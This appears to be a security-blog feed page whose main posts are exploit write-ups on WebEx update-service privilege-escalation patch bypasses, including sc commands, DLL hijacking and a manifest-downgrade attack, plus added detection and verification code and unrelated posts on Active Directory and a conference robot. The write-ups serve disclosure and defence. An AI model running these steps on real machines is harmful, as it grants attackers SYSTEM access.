As an exploit writer, one of my tasks consists of gathering common vulnerabilities and exposures (CVEs) and all of the information related to them in order to design an exploit for Core Impact. As part of this process I stumbled across CVE-2018-15422: a vulnerability in the update service of the Cisco WebEx Meetings Desktop App for Windows.

Ron Bowes and Jeff McJunkin from Counter Hack discovered this vulnerability and named it WebExec.

If you take a look at the blog post that Ron wrote, you'll find the details of the vulnerability, along with the Metasploit (msf) modules to exploit it locally and remotely.

What caught my attention was the fact that the patch for the vulnerability consisted of forcing the service to only run files that are signed by WebEx. As the blog post states, this is bad news, since there are many binaries signed by WebEx, including the service binary itself.

For example, the following PowerShell script (ListSignedBinaries.ps1) will enumerate all the binaries signed by WebEx, for the current version, in the default installation directory (%ProgramFiles%):

if ([Environment]::Is64BitOperatingSystem) {
    $apppath = ${env:ProgramFiles(x86)}
} else {
    $apppath = ${env:ProgramFiles}
}
$apppath = Join-Path -Path $apppath -ChildPath "Webex"

# -Name returns paths relative to $apppath, so join them back before checking
Get-ChildItem -Path $apppath -Filter *.exe -Recurse -File -Name | ForEach-Object {
    $fullpath = Join-Path -Path $apppath -ChildPath $_
    $cert = (Get-AuthenticodeSignature $fullpath).SignerCertificate
    # Unsigned binaries have no SignerCertificate; skip them instead of
    # failing with "You cannot call a method on a null-valued expression"
    if ($null -ne $cert -and $cert.Subject.Contains("WebEx")) {
        Write-Output ($fullpath + " =>> " + $cert.Subject)
    }
}

[Screenshot CVE-2018-15442-b.jpg: signed WebEx binaries]

After reading this information, the first thing that came to my mind was DLL hijacking. If the service only runs binaries signed by WebEx, then I might be able to find a binary capable of loading a malicious DLL. The easiest way to do that is by moving the signed binary to another directory in order to force the loading of our DLL.

I decided to test the patch. After reading the advisory provided by Cisco – which stated that the fixed version was 33.5.6 – I discovered this wasn't quite accurate, since the installer for version 33.5.1.7 was not vulnerable to the attack. That made version 33.4.5.5 the last version vulnerable to CVE-2018-15442.

So, I downloaded version 33.6.2.16 (which was the latest version at the time) and tried my idea to bypass the patch.

To do this, I launched a Windows 10 x86-64 VM, with the latest version installed, Process Explorer and Process Monitor running (and logging only File System Activity) and tried the known attack in the console: 

sc start webexservice install software-update 1 "C:\Windows\System32\notepad.exe"

Of course, no notepad with SYSTEM privileges was executed, since this version is patched. But, after checking the Process Monitor's log, I saw something strange:

[Screenshot CVE-2018-15442-d.jpg: Process Monitor log]

The service binary (WebExService.exe) was trying to open the file "C:\Windows\SysWOW64\notepad.exe\ptupdate.exe." I tried the attack again, this time using the following command: 

sc start webexservice install software-update 1 "C:\Windows\System32\"

 

This resulted in the following: 

[Screenshot CVE-2018-15442-f.jpg: Process Monitor log]

The service tried to add "\ptupdate.exe" to the passed argument path. That meant that the binary file passed to the service needed to be signed and needed to be named "ptupdate.exe".
To confirm, I tried:

sc start webexservice install software-update 1 "C:\Windows\System32"

and the result was: 

[Screenshot CVE-2018-15442-h.jpg: Process Monitor log]

That's it. Now I needed to find a binary that could be used to perform our attack. The first thing I searched for was the binary whose name was appended to our path: ptupdate.exe. I found it in "C:\Program Files(x86)\Webex\Webex\Applications\ptUpdate.exe".

So I wrote a little batch script as follows:

mkdir %tmp%\hijack
cd %tmp%\hijack
copy "%ProgramFiles(x86)%\Webex\Webex\Applications\ptUpdate.exe" .


Again, I tested the service by executing: 

sc start webexservice install software-update 1 "C:\Users\McFly\AppData\Local\Temp\hijack"

 

Note that we could not use environment variables in the path parameter passed to the service.

And the signed binary was found:

[Screenshot CVE-2018-15442-k.jpg: Process Monitor log]

But it was not yet executed. 
 
After reviewing Ron's blogpost, I noticed his statement about the numeric parameter. He stated that the only number that would work in the third parameter was the number 1. But he didn't know why or what the number meant. As he used trial and error to "be lucky," I decided to do the same by performing a quick test: 

sc start webexservice install software-update 2 "C:\Users\McFly\AppData\Local\Temp\hijack"

 

Process Monitor showed the following:

[Screenshot CVE-2018-15442-m.jpg: Process Monitor log]

The outcome was that the signed binary executed! We also got lucky and the number 2 worked. Later, I found out that number 1 works with the previous version (33.6.0.655), so it was important to try with both numbers.

Now it was time to perform our DLL hijacking.

I created a small i386 DLL in ASM that executed notepad.exe on load. After looking in Process Monitor's log for "NAME NOT FOUND" for DLL files in our controlled path, I chose the name wbxtrace.dll:

[Screenshot CVE-2018-15442-n.jpg: Process Monitor log]

After naming our DLL wbxtrace.dll, I placed it into our controlled folder and ran the attack again. Consequently, I got:

[Screenshot CVE-2018-15442-o.jpg: wbxtrace.dll loaded]

Our notepad.exe running as SYSTEM bypassed the patch. 
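Detection logic for the pattern above, as an added example that is not part of the original post: it scans constructed Sysmon-style process-creation and image-load records for the service being started with the update parameters, for a WebEx binary running from or loading a DLL from outside the default install directory, and for an unsigned DLL loaded from anywhere (which catches a replacement dropped into the install directory itself). TRUSTED_PREFIXES, INSTALL_DIR, HIJACK_DIR and the sample records are assumptions built from the paths in the post.

```python
"""Detection checks for the WebEx service DLL-hijack pattern.

Added example, not from the original post. It runs over constructed
Sysmon-style records (Event ID 1 process creation and Event ID 7 image
load, using Sysmon's field names Image, CommandLine, ImageLoaded, Signed
and Signature). The install path is the default one named in the post;
adjust TRUSTED_PREFIXES for non-default installs.
"""

WEBEX_BINARIES = {"webexservice.exe", "ptupdate.exe"}

# Directories a WebEx binary, and the DLLs it loads, are expected to come from.
TRUSTED_PREFIXES = (
    "c:\\program files (x86)\\webex\\",
    "c:\\program files\\webex\\",
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
)


def _norm(path):
    """Case-fold and normalise separators so prefix checks are stable."""
    return path.replace("/", "\\").lower()


def _basename(path):
    return _norm(path).rsplit("\\", 1)[-1]


def _trusted(path):
    return _norm(path).startswith(TRUSTED_PREFIXES)


def check_process_create(rec):
    """Event ID 1: sc.exe starting webexservice with the update parameters.

    Covers both parameter shapes seen in the posts: "install software-update
    N <path>" and "WebexService N <number> <path>"."""
    if _basename(rec.get("Image", "")) != "sc.exe":
        return None
    tokens = rec.get("CommandLine", "").lower().split()
    if (len(tokens) >= 4 and tokens[1] == "start"
            and tokens[2] == "webexservice"
            and tokens[3] in ("install", "webexservice")):
        return f"webexservice started with update parameters: {rec['CommandLine']}"
    return None


def check_image_load(rec):
    """Event ID 7: a WebEx binary running from an unexpected path, loading a
    DLL from an unexpected path, or loading an unsigned DLL from anywhere."""
    loader = rec.get("Image", "")
    if _basename(loader) not in WEBEX_BINARIES:
        return None
    dll = rec.get("ImageLoaded", "")
    if not _trusted(loader):
        return f"{_basename(loader)} running from untrusted path: {loader}"
    if not _trusted(dll):
        return f"{_basename(loader)} loaded {_basename(dll)} from untrusted path: {dll}"
    if rec.get("Signed", "").lower() != "true":
        # Path checks alone miss a replacement DLL written into the install
        # directory itself, so the signature state is the last line of defence.
        return f"{_basename(loader)} loaded unsigned {_basename(dll)}: {dll}"
    return None


CHECKS = {1: check_process_create, 7: check_image_load}


def scan(records):
    """Apply the check for each record's event ID; returns findings in order."""
    findings = []
    for rec in records:
        check = CHECKS.get(rec.get("EventID"))
        finding = check(rec) if check else None
        if finding:
            findings.append(finding)
    return findings


INSTALL_DIR = r"C:\Program Files (x86)\Webex\Webex\Applications"
HIJACK_DIR = r"C:\Users\McFly\AppData\Local\Temp\hijack"

# Constructed records: the first three are malicious, the last two are benign.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": f'sc start webexservice install software-update 2 "{HIJACK_DIR}"'},
    {"EventID": 7, "Image": HIJACK_DIR + r"\ptUpdate.exe",
     "ImageLoaded": HIJACK_DIR + r"\wbxtrace.dll", "Signed": "false", "Signature": ""},
    {"EventID": 7, "Image": INSTALL_DIR + r"\ptUpdate.exe",
     "ImageLoaded": INSTALL_DIR + r"\vcruntime140.dll", "Signed": "false", "Signature": ""},
    {"EventID": 7, "Image": INSTALL_DIR + r"\ptUpdate.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true",
     "Signature": "Microsoft Windows"},
    {"EventID": 1, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc query webexservice"},
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("ALERT:", finding)
```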

You can read our full advisory here.

I want to thank Adrian Manrique for giving me the chance to make this blog post. 

@MCKSysAr

By Marcos Accossatto

WebExec Revolutions: The strange case of the Update Service…that doesn’t update

In a previous blog post, I described how I bypassed the patch for the first fix for CVE-2018-15422. That bypass was also discovered by other researchers as well. You can check that out in Cisco’s updated advisory.

Now, WebExec was the name given to that first vulnerability by Ron Bowes and Jeff McJunkin. The second vulnerability (a DLL hijacking) was found by several researchers, but @steventseeley gave it the name WebExec Reloaded (you can check his blog post on WebExec Reloaded here). To continue the tradition of honoring “The Matrix”, I named this third vulnerability WebExec Revolutions.

The WebEx version that fixed the DLL hijacking vulnerability was 33.6.4.15. After that version the application was updated several times over: 33.6.5.2, 33.6.6.15, 33.7.0.694, 33.7.1.15, 33.7.2.24, 33.7.3.7, 33.8.0.779, 33.8.1.13, 33.8.2.7, 33.9.0.602, 33.9.1.9 and 33.9.2.3 (33.7.2.24 was the latest version at the time of my first tests). This vulnerability affects all the listed versions, except for 33.6.6.15, 33.7.0.694, and the 33.9.X versions. All the 33.8.X versions require a two-stage attack to work. As you’ll see later, version 33.9.0.602 (and later) rendered this attack unusable.

After the release of a patched version, I tested it again to see if the issue had been fixed. After I installed the patched version for the DLL Hijacking vulnerability (33.6.4.15), and was able to prove that the bug was fixed, I got really interested in this update service and I decided to take a look under the hood.

In the previous attack, we used “install” as the first parameter for the service, but if you look at the main function of WebExService.exe, you’ll see that you can also pass “uninstall” or a third value, which could be “WebexService”.

 

[Image 1: WebexService]

If you look at image 1, you’ll see that the function StartServiceCtrlDispatcherW will be called when the “WebexService” parameter is used. Looking at the documentation for that API, you’ll see that the ServiceMain function for the service is defined at 0x402CE6 and that it points to function 0x402D60.

Inside 0x402D60, you’ll see that the things get interesting starting at 0x402F56:

 

[Image 2: 0x402F56]

I have renamed the called function to PreDownFParam (the address for the function is 0x403700). That function first extracts the installation path from the registry in order to obtain a full path to the ptUpdate.exe executable. Then it counts the number of passed parameters. Finally, we get to the really interesting part: 0x403A02

[Image 3: 0x403A02]

In image 3, you can see that the function of interest is DownloadFileParam.

The function takes 5 parameters. The first parameter (int) is checked:

[Image 4: PathQuoteSpacesW]

Then it concatenates the value with “/DownloadFile” and all the rest of the parameters. Notice the PathQuoteSpacesW function calls:

[Image 5: /DownloadFile]

Later, it takes the token from winlogon.exe:

 

[Image 6: winlogon.exe]

[Image 7: winlogon.exe]

And finally runs ptUpdate.exe as SYSTEM with CreateProcessAsUserW using the duplicated token:

 

[Image 8: CreateProcessAsUserW]

After learning all that, I realized I could run something like this…

sc start webexservice WebexService 1 989898 "C:\Users\McFly"

 

As I did before, I launched a Windows 10 x86-64 VM, with version 33.6.4.15 installed, Process Explorer and Process Monitor running (and logging only File System Activity) and tried the previous command:

[Image 9: Process Explorer and Process Monitor running]

Looks like we’ve found something good! The updater is trying to open ptUpdate.xml. Now, I needed to figure out the structure of that file.

To make life easier I connected the VM to the internet, launched the application, and logged in. After a few seconds, a new update message appeared. In that moment, I found out that the application already had downloaded all the files for the new version, and that the current version was 33.7.2.24.

In the temp path for the current user a folder named “ptools” was created, containing inside another folder called “ptools-<GUID>” where <GUID> is a value like “FE456789-2457-3678-2EDF-FFFFFF234568”.

Inside that folder there were a lot of .7z files, along with the file that I needed, ptUpdate.xml:

 

<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service" xmlns:com="http://www.webex.com/schemas/2002/06/common" xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
    <serv:header></serv:header>
    <serv:body>
        <serv:bodyContent xsi:type="use:getUpdateResponse" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
            <UpdateVersionNumber>33.7.2</UpdateVersionNumber>
            <BuildNumber>33.7.2-24</BuildNumber>
            <ExternalVersionNumber>33.7.2.24</ExternalVersionNumber>
            <GPCINI>self/gpc.php</GPCINI>
            <ReleaseDate>February 2017</ReleaseDate>
            <Description>WebEx Productivity Tools 33.7.2</Description>
            <MsiLocation>msi/ptools.msi</MsiLocation>
            <UpdateFormat>binary</UpdateFormat>
            <ReleaseTrain>T32</ReleaseTrain>
            <Location>$dummy/upgradeserver/client/ptool/33.7.2</Location>
            <ControlOption>0</ControlOption>
            <WBSVERSION>33</WBSVERSION>
            <Server> myCompany.webex.com</Server>
            <UserName> MCKSysAR@myCompany.com</UserName>
            <DownloadSize>22496333</DownloadSize>
            <VersionURL/>
            <FileInfo>
                <SectionName>Service</SectionName>
                <PackedName>ptsrv.7z</PackedName>
                <PackedNameL10N>ptsrv.7z</PackedNameL10N>
                <OrigianlName>ptsrv.exe</OrigianlName>
                <Version>3306,0,1809,600</Version>
                <Size>210488</Size>
                <PackagedSize>72824</PackagedSize>
                <CheckMethod>1</CheckMethod>
                <CouldIgnore>1</CouldIgnore>
                <NeedDownLoad>1</NeedDownLoad>
            </FileInfo>
            <FileInfo>
                <SectionName>Installation</SectionName>
                <PackedName>WebExService.7z</PackedName>
                <PackedNameL10N>WebExService.7z</PackedNameL10N>
                <OrigianlName>WebExService.exe</OrigianlName>
                <Version>3307,1,1811,1500</Version>
                <Size>149560</Size>
                <PackagedSize>68398</PackagedSize>
                <CheckMethod>1</CheckMethod>
                <CouldIgnore>1</CouldIgnore>
                <NeedDownLoad>1</NeedDownLoad>
            </FileInfo>
            <Tools>
                <UseEmailType/>
                <Outlook>0</Outlook>
                <Notes>0</Notes>
                <UseWebExWithOffice>1</UseWebExWithOffice>
                <Excel>0</Excel>
                <PowerPoint>0</PowerPoint>
                <Word>0</Word>
                <IEShortCut>1</IEShortCut>
                <IERightMenu>0</IERightMenu>
                <UseWebExWithIM>1</UseWebExWithIM>
                <AOL>0</AOL>
                <Sametime>0</Sametime>
                <WindowsMessenger>0</WindowsMessenger>
                <Yahoo>0</Yahoo>
                <Skype>0</Skype>
                <GoogleTalk>0</GoogleTalk>
                <Firefox/>
                <IPPhone>1</IPPhone>
            </Tools>
        </serv:bodyContent>
    </serv:body>
</serv:message>

Notice that I have removed several <FileInfo> tags, for simplicity.

Now that I had the xml structure, I took a snapshot with the updated version.

Then, I increased the version numbers to force the installation (I changed all the 33.7.2 values to 33.7.3) and copied the ptUpdate.xml to my controlled folder.

Then I launched the service again:

sc start webexservice WebexService 1 989898 "C:\Users\McFly"

 

[Image 10: WebexService]

Our xml is found. Now, another file is requested:

[Image 11: ptupdate.exe]

Looking in the “ptools-<GUID>” folder, I found it. One curious thing is that when I tried to open it with 7zip, I noticed that the file wasn’t compressed:

[Image 12: ptools-<GUID> folder]

In fact, that file turned out to be a library which is used to decompress the other files of the update. I figured that out by looking at the exported functions of the library:

[Image 13: exported functions of the library]

Next, I reverted to the saved snapshot, copied this file to my folder and started the service again:

[Image 14: temp folder]

The file was found this time and was copied to the temp folder of the current user. Since the updater is running as SYSTEM, the temp folder is C:\Windows\Temp.

Other than the above, nothing else happened.

The first thing I needed to know was whether the update was working. In order to do that, I needed to copy all the files listed in the xml to my controlled folder. But even if the update worked, I had no way to confirm it (unless I reverted to the snapshot with the previous version, which was too tedious, since I hadn’t taken that snapshot in a “clean way”), so I needed to try something else.

So, I decided to test a simple trick in order to fool the update mechanism: take the updater itself (ptUpdate.exe) and replace it with the one from the previous version. The current version of the binary was 3307.1.1811.1500. My previous version was 3306.4.1811.1600.

I reverted the snapshot, and after copying all the files to my controlled folder, I compressed the previous ptUpdate.exe. I checked the compression settings used to create the .7z file with the current ptUpdate.7z:

[Image 15: ptUpdate.7z compression settings]

That’s “Normal” compression level and “LZMA” compression method in 7zip GUI. The command line for 7z.exe is:

7z.exe a ptUpdate.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21

 

Also, I updated the values of “Size”, “PackagedSize” and “Version” for the new binary in the ptUpdate.xml.

I ran the service again and went to see if the update (and our trick) worked by checking the version of the ptUpdate.exe binary:

[Image 16: ptupdate.exe version]

I couldn’t believe my eyes: The updater was updated with its previous version!

At this point, knowing that we had an updater that downgrades itself, maybe we could replace it with the version that was vulnerable to DLL hijacking (version 3306.0.1809.2900).
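Parsing the ptUpdate.xml structure shown above and applying the monotonic version check that the updater evidently lacks, as an added example that is not WebEx’s code: the manifest is a constructed subset of the one above, with the ptUpdate.exe entry carrying the older version from the downgrade experiment, and INSTALLED_VERSIONS is a constructed stand-in for what the installed build reports.

```python
"""Parse a ptUpdate.xml manifest and refuse per-file downgrades.

Added example, not WebEx's code. MANIFEST is a constructed subset of the
manifest shown in the post and INSTALLED_VERSIONS is constructed too.
"""
import xml.etree.ElementTree as ET

# Constructed: the ptUpdate.exe entry deliberately carries the OLDER version
# from the downgrade experiment; ptsrv.exe is a genuine upgrade.
MANIFEST = """<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
              xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
  <serv:header></serv:header>
  <serv:body>
    <serv:bodyContent xsi:type="use:getUpdateResponse"
                      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <UpdateVersionNumber>33.7.3</UpdateVersionNumber>
      <ExternalVersionNumber>33.7.3.7</ExternalVersionNumber>
      <FileInfo>
        <SectionName>Installation</SectionName>
        <PackedName>ptUpdate.7z</PackedName>
        <OrigianlName>ptUpdate.exe</OrigianlName>
        <Version>3306,4,1811,1600</Version>
        <Size>150000</Size>
        <PackagedSize>70000</PackagedSize>
        <CheckMethod>1</CheckMethod>
        <NeedDownLoad>1</NeedDownLoad>
      </FileInfo>
      <FileInfo>
        <SectionName>Service</SectionName>
        <PackedName>ptsrv.7z</PackedName>
        <OrigianlName>ptsrv.exe</OrigianlName>
        <Version>3307,1,1811,1500</Version>
        <Size>210488</Size>
        <PackagedSize>72824</PackagedSize>
        <CheckMethod>1</CheckMethod>
        <NeedDownLoad>1</NeedDownLoad>
      </FileInfo>
    </serv:bodyContent>
  </serv:body>
</serv:message>
"""

# Constructed: versions the installed binaries report before the update.
INSTALLED_VERSIONS = {
    "ptUpdate.exe": (3307, 1, 1811, 1500),
    "ptsrv.exe": (3306, 0, 1809, 600),
}


def parse_version(text):
    """'3306,4,1811,1600' -> (3306, 4, 1811, 1600). Tuples of ints compare
    numerically; comparing the raw strings would not."""
    return tuple(int(part) for part in text.strip().split(","))


def parse_manifest(xml_text):
    """Return (external version string, list of FileInfo entries).

    FileInfo and its children carry no namespace in this format, and the
    tag OrigianlName is spelt exactly as the manifest spells it."""
    root = ET.fromstring(xml_text)
    entries = []
    for info in root.iter("FileInfo"):
        entries.append({
            "section": info.findtext("SectionName"),
            "packed": info.findtext("PackedName"),
            "name": info.findtext("OrigianlName"),
            "version": parse_version(info.findtext("Version")),
            "size": int(info.findtext("Size")),
            "packaged_size": int(info.findtext("PackagedSize")),
            "need_download": info.findtext("NeedDownLoad") == "1",
        })
    return root.findtext(".//ExternalVersionNumber"), entries


def plan_update(entries, installed=INSTALLED_VERSIONS):
    """Decide per file: 'install', 'skip' or 'reject: ...'. The monotonic
    version check is what stops a manifest from rolling a binary back to an
    older build."""
    plan = {}
    for entry in entries:
        name, new = entry["name"], entry["version"]
        current = installed.get(name)
        if not entry["need_download"] or new == current:
            plan[name] = "skip"
        elif current is not None and new < current:
            plan[name] = f"reject: downgrade {new} < installed {current}"
        else:
            plan[name] = "install"
    return plan


def size_matches(entry, packed_blob):
    """PackagedSize is the only per-file check the manifest offers. It catches
    truncation and nothing else: any blob of the right length passes, which
    is why a signature check on every downloaded binary is also needed."""
    return len(packed_blob) == entry["packaged_size"]


if __name__ == "__main__":
    version, entries = parse_manifest(MANIFEST)
    print("manifest advertises", version)
    for name, decision in plan_update(entries).items():
        print(f"{name}: {decision}")
```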

To test that theory I created a smaller ptUpdate.xml with the same previous data, but only 2 “FileInfo” entries: one for ptUpdate.exe and one for wbxtrace.dll (our previous malicious DLL). Notice that the DLL must have the value “Common” for the “SectionName” tag.

Once again I reverted the snapshot and copied the 3 files to my controlled folder; I took the atgpcdec.dll file from the application’s installation folder, since it’s not compressed, and renamed it to atgpcdec.7z.

But after running the service, I realized that the attack didn’t work…*sigh*

I decided to test again, but this time with the updater version that worked. But this updater was not vulnerable to DLL hijacking, so I checked for another DLL that could be loaded by the updater itself or by another process with SYSTEM privileges. Also, it cannot be any of the DLLs that are signed by Cisco. The answer was the Visual Studio C (VC) runtime DLL: vcruntime140.dll.

Again I compressed the previous, working version of the updater. I created another DLL that executes “notepad.exe” on load, but this time I had to export all the functions the real VC runtime exports. Once the XML was updated with the changes, I reverted the snapshot and copied the three files into my controlled folder (remember that atgpcdec.7z is just atgpcdec.dll copied from the application’s installation folder and renamed).

And, after running the service one more time, I got…

Image 17: notepad.exe (two instances running as SYSTEM)

Not 1, but 2 notepad.exe’s running as SYSTEM!

As you can see, there are several binaries that run as SYSTEM in the update process.

Keep in mind that this leaves the application unusable: the genuine VC runtime (and, if you want, the updater too) has to be restored afterwards for the application to keep working.

As mentioned earlier, all the listed 33.8.X versions, starting with 33.8.0.779, require a two-stage attack:

  • First, replace only the current ptUpdate.exe with the one from a 33.7.X version (except 33.7.0.694).
  • Second, replace ptUpdate.exe with the one from version 33.6.4.15, together with the vcruntime140.dll library.

The two stages are required because version 33.8.0.779 added signature checking for all downloaded binaries, not only Cisco’s own.

Starting with version 33.9.0.602 this attack no longer works, because ptUpdate.xml is not used in the update process; ptUpdate.ini is used instead. That .ini file has, among others, two sections ([CryptInfo] and [CryptInfoEx]) that enumerate the hashes of all the files in the update (information an attacker can recompute and change), plus a signing-information value (the GpcSignedInfo item). This base64-encoded value looks like a certificate, but its value is invalid: I copied it into .cer and .crt files, and it could not be parsed as a valid certificate.
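The core of the problem in the downgrade test, the two-stage 33.8.X attack and the 33.9 fix is the same question: what does the updater verify before it installs what the manifest tells it to? The following is an added example, not Cisco's code, that puts the behaviour exploited above (vendor signatures checked only on the vendor's own files, the manifest trusted as served, no comparison with the installed version) beside a hardened check that verifies a vendor-signed manifest carrying per-file hashes, the shape the write-up describes for ptUpdate.ini. Signatures are simulated with HMAC-SHA256 under constructed keys so the block runs offline; a real updater would verify Authenticode/X.509 signatures. The file names and the 3306/3307 version strings come from the write-up, while the file contents, the 3308 version, the KEYS/Payload/sign/verify helpers and the rollback check are this example's own assumptions.

```python
"""Updater-manifest verification: the behaviour the write-up exploited beside a
hardened version. Added example, not Cisco's code: signatures are simulated with
HMAC-SHA256 under constructed keys so it runs offline, whereas a real updater
would verify Authenticode/X.509 signatures. File names and the 3306/3307 version
strings come from the write-up; contents and the 3308 version are constructed."""
import hashlib
import hmac
import json
from dataclasses import dataclass
from typing import Dict, List, Optional

KEYS = {"Cisco": b"cisco-key-stand-in", "Microsoft": b"ms-key-stand-in"}  # constructed stand-ins


def sign(signer: str, data: bytes) -> bytes:
    return hmac.new(KEYS[signer], data, hashlib.sha256).digest()


def verify(signer: Optional[str], data: bytes, sig: Optional[bytes]) -> bool:
    if signer not in KEYS or sig is None:
        return False
    return hmac.compare_digest(sign(signer, data), sig)


def parse_version(v: str) -> tuple:
    # "3307.1.1811.1500" -> (3307, 1, 1811, 1500): compare field by field, never as strings
    return tuple(int(p) for p in v.split("."))


def canonical(manifest: dict) -> bytes:
    return json.dumps(manifest, sort_keys=True).encode()


@dataclass
class Payload:
    """A downloaded file; signer/signature stand in for an embedded Authenticode signature."""
    name: str
    content: bytes
    signer: Optional[str] = None
    signature: Optional[bytes] = None


def vulnerable_update(manifest: dict, payloads: List[Payload], installed: str) -> bool:
    """Pre-33.8 style: the manifest is trusted as served, only vendor-signed
    files are checked, unsigned files pass as 'third party', and the offered
    version is never compared with the installed one."""
    by_name = {p.name: p for p in payloads}
    for entry in manifest["files"]:
        p = by_name[entry["name"]]
        if p.signer == "Cisco" and not verify("Cisco", p.content, p.signature):
            return False
    return True


def hardened_update(manifest: dict, manifest_sig: bytes, payloads: List[Payload],
                    installed: str) -> bool:
    """Every file must match a hash in a vendor-signed manifest (the shape the
    33.9 ptUpdate.ini takes, per the write-up) and carry a trusted signature.
    The rollback check is this example's addition; the page does not say the
    fix includes one."""
    if not verify("Cisco", canonical(manifest), manifest_sig):
        return False                                  # tampered or unsigned manifest
    if parse_version(manifest["version"]) <= parse_version(installed):
        return False                                  # downgrade / replay of an old signed update
    by_name = {p.name: p for p in payloads}
    for entry in manifest["files"]:
        p = by_name.get(entry["name"])
        if p is None or len(p.content) != entry["size"]:
            return False
        if hashlib.sha256(p.content).hexdigest() != entry["sha256"]:
            return False
        if not verify(p.signer, p.content, p.signature):  # unsigned (signer=None) fails here
            return False
    return True


def make_payload(name: str, content: bytes, signer: Optional[str] = None) -> Payload:
    return Payload(name, content, signer, sign(signer, content) if signer else None)


def manifest_for(version: str, payloads: List[Payload]) -> dict:
    return {"version": version,
            "files": [{"name": p.name, "size": len(p.content),
                       "sha256": hashlib.sha256(p.content).hexdigest()} for p in payloads]}


def scenario() -> Dict[str, bool]:
    """Replay the write-up's two-file trick, then a signed-but-old update, then a genuine one."""
    installed = "3307.1.1811.1500"
    old_exe = make_payload("ptUpdate.exe", b"constructed 3306.4 updater", "Cisco")
    evil_dll = make_payload("vcruntime140.dll", b"constructed DLL that spawns notepad")
    attack = manifest_for("3306.4.1811.1600", [old_exe, evil_dll])
    # The attacker owns the download folder but not Cisco's key: hashes are easy, a signature is not.
    forged_sig = hashlib.sha256(canonical(attack)).digest()

    ms_dll = make_payload("vcruntime140.dll", b"constructed MS runtime", "Microsoft")
    signed_old = manifest_for("3306.4.1811.1600", [old_exe, ms_dll])

    new_exe = make_payload("ptUpdate.exe", b"constructed 3308.0 updater", "Cisco")
    genuine = manifest_for("3308.0.1901.100", [new_exe, ms_dll])

    return {
        "vulnerable_accepts_attack": vulnerable_update(attack, [old_exe, evil_dll], installed),
        "hardened_accepts_attack": hardened_update(attack, forged_sig, [old_exe, evil_dll], installed),
        "hardened_accepts_signed_old": hardened_update(signed_old, sign("Cisco", canonical(signed_old)),
                                                       [old_exe, ms_dll], installed),
        "hardened_accepts_genuine": hardened_update(genuine, sign("Cisco", canonical(genuine)),
                                                    [new_exe, ms_dll], installed),
    }


if __name__ == "__main__":
    for check, result in scenario().items():
        print(f"{check}: {result}")
```

The two checks are the point of the example: the vulnerable path accepts the genuinely signed but older ptUpdate.exe next to an unsigned vcruntime140.dll because it never asks who vouches for the manifest or whether the version goes backwards, while the hardened path rejects the forged manifest outright and, even when handed a manifest the vendor really did sign for an older release, refuses it because of the version comparison. Hashes inside an unsigned manifest, as the write-up notes, are information the attacker can simply recompute.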

Cisco later confirmed that version 33.9.0.602 was the first fix but that it was an intermediate release. The patched versions are 33.6.6.15, 33.7.0.694, and all the 33.9.X versions. For updates, check the Cisco advisory for this vulnerability.

The full advisory with a Proof of Concept is here.

@MCKSysAR

Author: Marcos Accossatto (CoreLabs)

A Simple Trillion$ Cyber Security Question for the Entire RSA Conference

Folks,

This week, the famous RSA Conference 2019 is underway, where supposedly "The World Talks Security" -


Image Courtesy RSA Conference. Source: https://www.rsaconference.com/

If that's the case, let's talk -  I'd like to respectfully ask the entire RSA Conference just 1 simple cyber security question -

Question: What lies at the very foundation of cyber security and privileged access of not just the RSAs, EMCs, Dells, CyberArks, Gartners, Googles, Amazons, Facebooks and Microsofts of the world, but also at the foundation of virtually all cyber security and cloud companies and at the foundation of over 85% of organizations worldwide?

For those who may not know the answer to this ONE simple cyber security question, the answer's in line 1 here.



For those who may know the answer, and I sincerely hope that most of the world's CIOs, CISOs, Domain Admins, Cyber Security Analysts, Penetration Testers and Ethical Hackers know the answer, here are 4 simple follow-up questions -


  • Q 1.  Should your organization's foundational Active Directory be compromised, what could be its impact?
  • Q 2.  Would you agree that the (unintentional, intentional or coerced) compromise of a single Active Directory privileged user could result in the compromise of your organization's entire foundational Active Directory?
  • Q 3.  If so, then do you know that there is only one correct way to accurately identify/audit privileged users in your organization's foundational Active Directory, and do you possess the capability to correctly be able to do so?
  • Q 4.  If you don't, then how could you possibly know exactly how many privileged users there are in your organization's foundational Active Directory deployment today, and if you don't know so, ...OMG... ?!

You see, if even the world's top cyber security and cloud computing companies themselves don't know the answers to such simple, fundamental Kindergarten-level cyber security questions, how can we expect 85% of the world's organizations to know the answer, AND MORE IMPORTANTLY, what's the point of all this fancy peripheral cyber security talk at such conferences when organizations don't even know how many (hundreds if not thousands of) people have the Keys to their Kingdom(s) ?!


Today Active Directory is at the very heart of Cyber Security and Privileged Access at over 85% of organizations worldwide, and if you can find me even ONE company at the prestigious RSA Conference 2019 that can help organizations accurately identify privileged users/access in 1000s of foundational Active Directory deployments worldwide, you'll have impressed me.


Those who truly understand Windows Security know that organizations can neither adequately secure their foundational Active Directory deployments nor accomplish any of these recent buzzword initiatives like Privileged Access Management, Privileged Account Discovery, Zero-Trust etc. without first being able to accurately identify privileged users in Active Directory.

Best wishes,
Sanjay


PS: Pardon the delay. I've been busy and haven't had much time to blog since my last post on Cyber Security 101 for the C-Suite.

PS2: Microsoft, when were you planning to start educating the world about what's actually paramount to their cyber security?

Live from RSA: Sophia the Social Humanoid Robot

A big theme throughout RSA this year, from the keynote to vendor booths, is the power that artificial intelligence can bring to the security world. While we do leverage machine learning at Veracode to better our vulnerability database, we thought it would be a lot more fun to bring a different form of AI to the booth this year.

We invited Sophia, the world’s first social humanoid robot, to be a guest speaker at our booth. We engaged in an interview session with Sophia, and then opened the floor to attendees to ask her questions and get their pictures taken. Sophia is extremely lifelike in her facial appearance and expressions. The rest of her body, such as her arms, still looks robotic.

